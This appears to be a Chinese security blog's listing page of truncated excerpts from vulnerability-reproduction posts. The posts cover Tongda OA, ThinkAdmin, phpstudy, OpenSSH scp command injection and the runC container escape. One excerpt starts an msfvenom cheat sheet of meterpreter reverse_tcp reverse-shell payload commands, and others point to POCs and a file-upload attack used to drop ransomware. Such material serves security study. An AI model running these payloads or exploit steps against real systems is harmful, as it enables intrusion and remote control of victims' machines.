摘要:
漏洞环境搭建 访问https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe下载 按步骤安装即可 漏洞复现 漏洞有关文件 MYOA\webroot\mobile\auth_mobi.php <?php function relogin() { echo _ 阅读全文
摘要:
指纹识别 fofa搜索 body="恭喜, 站点创建成功" 环境搭建 1、直接使用宝塔搭建脚本一键安装 centos yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && s 阅读全文
摘要:
漏洞简介 ThinkAdmin是基于 ThinkPHP 的微信后台管理平台 影响范围: Thinkadmin版本小于 ≤ 2020.08.03.01 漏洞复现: 获取版本信息: https://xxxxx/admin.html?s=admin/api.Update/version POC POST 阅读全文
摘要:
phpstudy介绍 PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。 支持一键LAMP、LNMP、集群、监控、网站、数据库、FTP、软件中心、伪静态、云备份、SSL、多版本共存、Nginx反向代理、服务器防火墙、web防火墙、监控大屏等100多 阅读全文
摘要:
0x00 漏洞介绍 CVE编号:CVE-2020-15778 发布时间:2020-07-24 危害等级:高危 漏洞版本:<= openssh-8.3p1 漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用 阅读全文
摘要:
概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来 阅读全文
摘要:
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p w 阅读全文
摘要:
0X00简介 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。 该漏洞被黑产利用,用于投放勒索病毒。在绕过身份验证的情况下通过文件上传漏洞上传恶意php文件,组合 阅读全文